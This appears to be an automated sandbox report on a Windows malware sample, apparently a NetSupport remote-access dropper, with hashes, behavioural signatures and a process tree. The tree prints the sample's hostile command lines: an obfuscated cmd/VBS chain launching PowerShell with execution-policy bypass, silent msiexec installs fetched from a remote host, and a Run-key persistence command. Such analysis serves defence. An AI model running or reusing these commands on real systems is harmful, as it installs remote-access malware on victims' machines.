Analysis
-
max time kernel
105s -
max time network
130s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
29-10-2020 16:41
Static task
static1
Behavioral task
behavioral1
Sample
signed_gate6.bin.exe
Resource
win7v20201028
Behavioral task
behavioral2
Sample
signed_gate6.bin.exe
Resource
win10v20201028
General
-
Target
signed_gate6.bin.exe
-
Size
3.8MB
-
MD5
5b31c8bf67eea804fa636876a1828d20
-
SHA1
0f9862e659b5cd1233a7796d51e062d217df3c75
-
SHA256
a61bc88a1a994952b622c7eb01bfa9be65591c8cb5e69c4dae56edbd94deb384
-
SHA512
bf7175eb313fd1949e36056d478699327a05cbff1d5a0e68c4664df7c202197a25332ba270c8a5300367cf8d4b711d682d535071ce6c11ed125dd78c75f2909b
Malware Config
Signatures
-
NetSupport
NetSupport is a remote access tool sold as a legitimate system administration software.
-
Blacklisted process makes network request 1 IoCs
Processes:
msiexec.exeflow pid process 15 1504 msiexec.exe -
Executes dropped EXE 1 IoCs
Processes:
fonthost.exepid process 1092 fonthost.exe -
Loads dropped DLL 10 IoCs
Processes:
signed_gate6.bin.exefonthost.exepid process 4760 signed_gate6.bin.exe 4760 signed_gate6.bin.exe 4760 signed_gate6.bin.exe 4760 signed_gate6.bin.exe 4760 signed_gate6.bin.exe 1092 fonthost.exe 1092 fonthost.exe 1092 fonthost.exe 1092 fonthost.exe 1092 fonthost.exe -
Use of msiexec (install) with remote resource 2 IoCs
Processes:
msiexec.exemsiexec.exepid process 1280 msiexec.exe 2184 msiexec.exe -
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
reg.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\fonthost = "C:\\Users\\Admin\\AppData\\Roaming\\yLVpwSmr\\fonthost.exe" reg.exe -
JavaScript code in executable 2 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Roaming\yLVpwSmr\PCICL32.dll js \Users\Admin\AppData\Roaming\yLVpwSmr\PCICL32.DLL js -
Modifies registry key 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
powershell.exepid process 860 powershell.exe 860 powershell.exe 860 powershell.exe -
Suspicious use of AdjustPrivilegeToken 65 IoCs
Processes:
powershell.exemsiexec.exemsiexec.exemsiexec.exefonthost.exedescription pid process Token: SeDebugPrivilege 860 powershell.exe Token: SeShutdownPrivilege 1280 msiexec.exe Token: SeIncreaseQuotaPrivilege 1280 msiexec.exe Token: SeSecurityPrivilege 1504 msiexec.exe Token: SeCreateTokenPrivilege 1280 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 1280 msiexec.exe Token: SeLockMemoryPrivilege 1280 msiexec.exe Token: SeIncreaseQuotaPrivilege 1280 msiexec.exe Token: SeMachineAccountPrivilege 1280 msiexec.exe Token: SeTcbPrivilege 1280 msiexec.exe Token: SeSecurityPrivilege 1280 msiexec.exe Token: SeTakeOwnershipPrivilege 1280 msiexec.exe Token: SeLoadDriverPrivilege 1280 msiexec.exe Token: SeSystemProfilePrivilege 1280 msiexec.exe Token: SeSystemtimePrivilege 1280 msiexec.exe Token: SeProfSingleProcessPrivilege 1280 msiexec.exe Token: SeIncBasePriorityPrivilege 1280 msiexec.exe Token: SeCreatePagefilePrivilege 1280 msiexec.exe Token: SeCreatePermanentPrivilege 1280 msiexec.exe Token: SeBackupPrivilege 1280 msiexec.exe Token: SeRestorePrivilege 1280 msiexec.exe Token: SeShutdownPrivilege 1280 msiexec.exe Token: SeDebugPrivilege 1280 msiexec.exe Token: SeAuditPrivilege 1280 msiexec.exe Token: SeSystemEnvironmentPrivilege 1280 msiexec.exe Token: SeChangeNotifyPrivilege 1280 msiexec.exe Token: SeRemoteShutdownPrivilege 1280 msiexec.exe Token: SeUndockPrivilege 1280 msiexec.exe Token: SeSyncAgentPrivilege 1280 msiexec.exe Token: SeEnableDelegationPrivilege 1280 msiexec.exe Token: SeManageVolumePrivilege 1280 msiexec.exe Token: SeImpersonatePrivilege 1280 msiexec.exe Token: SeCreateGlobalPrivilege 1280 msiexec.exe Token: SeShutdownPrivilege 2184 msiexec.exe Token: SeIncreaseQuotaPrivilege 2184 msiexec.exe Token: SeSecurityPrivilege 1092 fonthost.exe Token: SeCreateTokenPrivilege 2184 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 2184 msiexec.exe Token: SeLockMemoryPrivilege 2184 msiexec.exe Token: SeIncreaseQuotaPrivilege 2184 msiexec.exe Token: SeMachineAccountPrivilege 2184 msiexec.exe Token: SeTcbPrivilege 2184 msiexec.exe Token: SeSecurityPrivilege 2184 msiexec.exe Token: SeTakeOwnershipPrivilege 2184 msiexec.exe Token: SeLoadDriverPrivilege 2184 msiexec.exe Token: SeSystemProfilePrivilege 2184 msiexec.exe Token: SeSystemtimePrivilege 2184 msiexec.exe Token: SeProfSingleProcessPrivilege 2184 msiexec.exe Token: SeIncBasePriorityPrivilege 2184 msiexec.exe Token: SeCreatePagefilePrivilege 2184 msiexec.exe Token: SeCreatePermanentPrivilege 2184 msiexec.exe Token: SeBackupPrivilege 2184 msiexec.exe Token: SeRestorePrivilege 2184 msiexec.exe Token: SeShutdownPrivilege 2184 msiexec.exe Token: SeDebugPrivilege 2184 msiexec.exe Token: SeAuditPrivilege 2184 msiexec.exe Token: SeSystemEnvironmentPrivilege 2184 msiexec.exe Token: SeChangeNotifyPrivilege 2184 msiexec.exe Token: SeRemoteShutdownPrivilege 2184 msiexec.exe Token: SeUndockPrivilege 2184 msiexec.exe Token: SeSyncAgentPrivilege 2184 msiexec.exe Token: SeEnableDelegationPrivilege 2184 msiexec.exe Token: SeManageVolumePrivilege 2184 msiexec.exe Token: SeImpersonatePrivilege 2184 msiexec.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
fonthost.exepid process 1092 fonthost.exe -
Suspicious use of WriteProcessMemory 19 IoCs
Processes:
signed_gate6.bin.execmd.exewscript.execmd.execmd.exepowershell.exedescription pid process target process PID 4760 wrote to memory of 3480 4760 signed_gate6.bin.exe cmd.exe PID 4760 wrote to memory of 3480 4760 signed_gate6.bin.exe cmd.exe PID 3480 wrote to memory of 4196 3480 cmd.exe wscript.exe PID 3480 wrote to memory of 4196 3480 cmd.exe wscript.exe PID 4196 wrote to memory of 416 4196 wscript.exe cmd.exe PID 4196 wrote to memory of 416 4196 wscript.exe cmd.exe PID 416 wrote to memory of 648 416 cmd.exe cmd.exe PID 416 wrote to memory of 648 416 cmd.exe cmd.exe PID 648 wrote to memory of 860 648 cmd.exe powershell.exe PID 648 wrote to memory of 860 648 cmd.exe powershell.exe PID 860 wrote to memory of 1280 860 powershell.exe msiexec.exe PID 860 wrote to memory of 1280 860 powershell.exe msiexec.exe PID 860 wrote to memory of 1900 860 powershell.exe reg.exe PID 860 wrote to memory of 1900 860 powershell.exe reg.exe PID 860 wrote to memory of 1092 860 powershell.exe fonthost.exe PID 860 wrote to memory of 1092 860 powershell.exe fonthost.exe PID 860 wrote to memory of 1092 860 powershell.exe fonthost.exe PID 860 wrote to memory of 2184 860 powershell.exe msiexec.exe PID 860 wrote to memory of 2184 860 powershell.exe msiexec.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\signed_gate6.bin.exe"C:\Users\Admin\AppData\Local\Temp\signed_gate6.bin.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:4760 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c ec^h^o CreateObject("Wscript.Shell").Run "cmd /c cmd /c powershell -ep bypass -f C:\Users\Admin\AppData\Local\Temp\Dapino-Religion-People-Church.ps1", 0, False > %appdata%\NWNCDTYSWS.vb^s& wscript %appdata%\NWNCDTYSWS.vb^s& del %appdata%\NWNCDTYSWS.vb^s2⤵
- Suspicious use of WriteProcessMemory
PID:3480 -
C:\Windows\system32\wscript.exewscript C:\Users\Admin\AppData\Roaming\NWNCDTYSWS.vbs3⤵
- Suspicious use of WriteProcessMemory
PID:4196 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c cmd /c powershell -ep bypass -f C:\Users\Admin\AppData\Local\Temp\Dapino-Religion-People-Church.ps14⤵
- Suspicious use of WriteProcessMemory
PID:416 -
C:\Windows\system32\cmd.execmd /c powershell -ep bypass -f C:\Users\Admin\AppData\Local\Temp\Dapino-Religion-People-Church.ps15⤵
- Suspicious use of WriteProcessMemory
PID:648 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -f C:\Users\Admin\AppData\Local\Temp\Dapino-Religion-People-Church.ps16⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:860 -
C:\Windows\system32\msiexec.exe"C:\Windows\system32\msiexec.exe" /i http://safuuf7774.pw/iplog/newg.php?hst=installing_EWYCRADZ /q7⤵
- Use of msiexec (install) with remote resource
- Suspicious use of AdjustPrivilegeToken
PID:1280
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v fonthost /t REG_SZ /d C:\Users\Admin\AppData\Roaming\yLVpwSmr\fonthost.exe /f7⤵
- Adds Run key to start application
- Modifies registry key
PID:1900
-
-
C:\Users\Admin\AppData\Roaming\yLVpwSmr\fonthost.exe"C:\Users\Admin\AppData\Roaming\yLVpwSmr\fonthost.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:1092
-
-
C:\Windows\system32\msiexec.exe"C:\Windows\system32\msiexec.exe" /i http://safuuf7774.pw/iplog/newg.php?hst=installed_EWYCRADZ /q7⤵
- Use of msiexec (install) with remote resource
- Suspicious use of AdjustPrivilegeToken
PID:2184
-
-
-
-
-
-
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Blacklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
PID:1504
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
ea776dea84f070b7ef2228bd65bf2a13
SHA18227cb202a56b0847544af4d93b3b614ace6e4bd
SHA2561ee81d0d3dc5c9cfe7ad5fb9d2e3bf76bb23168d0452605aaaf04b193f802855
SHA512d9f7387889be3b2c581a97b2ddadbe134336ec2bdd13ba802475e3092b2798d04fad127c60a3fe2da6e83dcebdda80570e9da7d05747790997047367c5724fd1
-
MD5
5f2b031697e9070572c3f2341b629efd
SHA15de1c2a0424553f94c604b598b68a782fe95e071
SHA2565d13210671707faf8a4b9367495a95c2170a647e0b7c7bb258b54607fd851f68
SHA512cfac5cf273f755516db5ae5f6724df57f6aa8eed7dd5d15fb867a3123b9974453731ed0ec5ca2fe43c1feacb000a45b463df20086e9304b875ea91453b18107d
-
MD5
2d3b207c8a48148296156e5725426c7f
SHA1ad464eb7cf5c19c8a443ab5b590440b32dbc618f
SHA256edfe2b923bfb5d1088de1611401f5c35ece91581e71503a5631647ac51f7d796
SHA51255c791705993b83c9b26a8dbd545d7e149c42ee358ecece638128ee271e85b4fdbfd6fbae61d13533bf39ae752144e2cc2c5edcda955f18c37a785084db0860c
-
MD5
0e37fbfa79d349d672456923ec5fbbe3
SHA14e880fc7625ccf8d9ca799d5b94ce2b1e7597335
SHA2568793353461826fbd48f25ea8b835be204b758ce7510db2af631b28850355bd18
SHA5122bea9bd528513a3c6a54beac25096ee200a4e6ccfc2a308ae9cfd1ad8738e2e2defd477d59db527a048e5e9a4fe1fc1d771701de14ef82b4dbcdc90df0387630
-
MD5
7067af414215ee4c50bfcd3ea43c84f0
SHA1c331d410672477844a4ca87f43a14e643c863af9
SHA2562050cc232710a2ea6a207bc78d1eac66a4042f2ee701cdfeee5de3ddcdc31d12
SHA51217b888087192bcea9f56128d0950423b1807e294d1c4f953d1bf0f5bd08e5f8e35afeee584ebf9233bfc44e0723db3661911415798159ac118c8a42aaf0b902f
-
MD5
00587238d16012152c2e951a087f2cc9
SHA1c4e27a43075ce993ff6bb033360af386b2fc58ff
SHA25663aa18c32af7144156e7ee2d5ba0fa4f5872a7deb56894f6f96505cbc9afe6f8
SHA512637950a1f78d3f3d02c30a49a16e91cf3dfccc59104041876789bd7fdf9224d187209547766b91404c67319e13d1606da7cec397315495962cbf3e2ccd5f1226
-
MD5
e67dad741ad8b2b2ea900d5051abbdf2
SHA1da59fb331870bb13d8eae5b266bae76e5e9221a3
SHA256c76aada941385472da3ec3c730f3d837832f62721f7a405f06cc19f1b8ad8523
SHA512f4844cba552c355fe9c9f8b624b8c4af96fbc585525da7ad472a31355e1299697fb08afd58356ee4d19cad3278886745113f14f223e0fef7d8bee856c942910b
-
MD5
8d9709ff7d9c83bd376e01912c734f0a
SHA1e3c92713ce1d7eaa5e2b1fabeb06cdc0bb499294
SHA25649a568f8ac11173e3a0d76cff6bc1d4b9bdf2c35c6d8570177422f142dcfdbe3
SHA512042ad89ed2e15671f5df67766d11e1fa7ada8241d4513e7c8f0d77b983505d63ebfb39fefa590a2712b77d7024c04445390a8bf4999648f83dbab6b0f04eb2ee
-
MD5
8d9709ff7d9c83bd376e01912c734f0a
SHA1e3c92713ce1d7eaa5e2b1fabeb06cdc0bb499294
SHA25649a568f8ac11173e3a0d76cff6bc1d4b9bdf2c35c6d8570177422f142dcfdbe3
SHA512042ad89ed2e15671f5df67766d11e1fa7ada8241d4513e7c8f0d77b983505d63ebfb39fefa590a2712b77d7024c04445390a8bf4999648f83dbab6b0f04eb2ee
-
MD5
dcde2248d19c778a41aa165866dd52d0
SHA17ec84be84fe23f0b0093b647538737e1f19ebb03
SHA2569074fd40ea6a0caa892e6361a6a4e834c2e51e6e98d1ffcda7a9a537594a6917
SHA512c5d170d420f1aeb9bcd606a282af6e8da04ae45c83d07faaacb73ff2e27f4188b09446ce508620124f6d9b447a40a23620cfb39b79f02b04bb9e513866352166
-
MD5
a0b9388c5f18e27266a31f8c5765b263
SHA1906f7e94f841d464d4da144f7c858fa2160e36db
SHA256313117e723dda6ea3911faacd23f4405003fb651c73de8deff10b9eb5b4a058a
SHA5126051a0b22af135b4433474dc7c6f53fb1c06844d0a30ed596a3c6c80644df511b023e140c4878867fa2578c79695fac2eb303aea87c0ecfc15a4ad264bd0b3cd
-
MD5
fbe295e5a1acfbd0a6271898f885fe6a
SHA1d6d205922e61635472efb13c2bb92c9ac6cb96da
SHA256a1390a78533c47e55cc364e97af431117126d04a7faed49390210ea3e89dd0e1
SHA5122cb596971e504eaf1ce8e3f09719ebfb3f6234cea5ca7b0d33ec7500832ff4b97ec2bbe15a1fbf7e6a5b02c59db824092b9562cd8991f4d027feab6fd3177b06
-
MD5
5afd4a9b7e69e7c6e312b2ce4040394a
SHA1fbd07adb3f02f866dc3a327a86b0f319d4a94502
SHA256053b4487d22aacf8274bab448ae1d665fe7926102197b47bfba6c7ed5493b3ae
SHA512f78efe9d1fa7d2ffc731d5f878f81e4dcbfaf0c561fdfbf4c133ba2ce1366c95c4672d67cae6a8bd8fcc7d04861a9da389d98361055ac46fc9793828d9776511
-
MD5
5afd4a9b7e69e7c6e312b2ce4040394a
SHA1fbd07adb3f02f866dc3a327a86b0f319d4a94502
SHA256053b4487d22aacf8274bab448ae1d665fe7926102197b47bfba6c7ed5493b3ae
SHA512f78efe9d1fa7d2ffc731d5f878f81e4dcbfaf0c561fdfbf4c133ba2ce1366c95c4672d67cae6a8bd8fcc7d04861a9da389d98361055ac46fc9793828d9776511
-
MD5
5afd4a9b7e69e7c6e312b2ce4040394a
SHA1fbd07adb3f02f866dc3a327a86b0f319d4a94502
SHA256053b4487d22aacf8274bab448ae1d665fe7926102197b47bfba6c7ed5493b3ae
SHA512f78efe9d1fa7d2ffc731d5f878f81e4dcbfaf0c561fdfbf4c133ba2ce1366c95c4672d67cae6a8bd8fcc7d04861a9da389d98361055ac46fc9793828d9776511
-
MD5
5afd4a9b7e69e7c6e312b2ce4040394a
SHA1fbd07adb3f02f866dc3a327a86b0f319d4a94502
SHA256053b4487d22aacf8274bab448ae1d665fe7926102197b47bfba6c7ed5493b3ae
SHA512f78efe9d1fa7d2ffc731d5f878f81e4dcbfaf0c561fdfbf4c133ba2ce1366c95c4672d67cae6a8bd8fcc7d04861a9da389d98361055ac46fc9793828d9776511
-
MD5
2d3b207c8a48148296156e5725426c7f
SHA1ad464eb7cf5c19c8a443ab5b590440b32dbc618f
SHA256edfe2b923bfb5d1088de1611401f5c35ece91581e71503a5631647ac51f7d796
SHA51255c791705993b83c9b26a8dbd545d7e149c42ee358ecece638128ee271e85b4fdbfd6fbae61d13533bf39ae752144e2cc2c5edcda955f18c37a785084db0860c
-
MD5
a0b9388c5f18e27266a31f8c5765b263
SHA1906f7e94f841d464d4da144f7c858fa2160e36db
SHA256313117e723dda6ea3911faacd23f4405003fb651c73de8deff10b9eb5b4a058a
SHA5126051a0b22af135b4433474dc7c6f53fb1c06844d0a30ed596a3c6c80644df511b023e140c4878867fa2578c79695fac2eb303aea87c0ecfc15a4ad264bd0b3cd
-
MD5
00587238d16012152c2e951a087f2cc9
SHA1c4e27a43075ce993ff6bb033360af386b2fc58ff
SHA25663aa18c32af7144156e7ee2d5ba0fa4f5872a7deb56894f6f96505cbc9afe6f8
SHA512637950a1f78d3f3d02c30a49a16e91cf3dfccc59104041876789bd7fdf9224d187209547766b91404c67319e13d1606da7cec397315495962cbf3e2ccd5f1226
-
MD5
0e37fbfa79d349d672456923ec5fbbe3
SHA14e880fc7625ccf8d9ca799d5b94ce2b1e7597335
SHA2568793353461826fbd48f25ea8b835be204b758ce7510db2af631b28850355bd18
SHA5122bea9bd528513a3c6a54beac25096ee200a4e6ccfc2a308ae9cfd1ad8738e2e2defd477d59db527a048e5e9a4fe1fc1d771701de14ef82b4dbcdc90df0387630
-
MD5
dcde2248d19c778a41aa165866dd52d0
SHA17ec84be84fe23f0b0093b647538737e1f19ebb03
SHA2569074fd40ea6a0caa892e6361a6a4e834c2e51e6e98d1ffcda7a9a537594a6917
SHA512c5d170d420f1aeb9bcd606a282af6e8da04ae45c83d07faaacb73ff2e27f4188b09446ce508620124f6d9b447a40a23620cfb39b79f02b04bb9e513866352166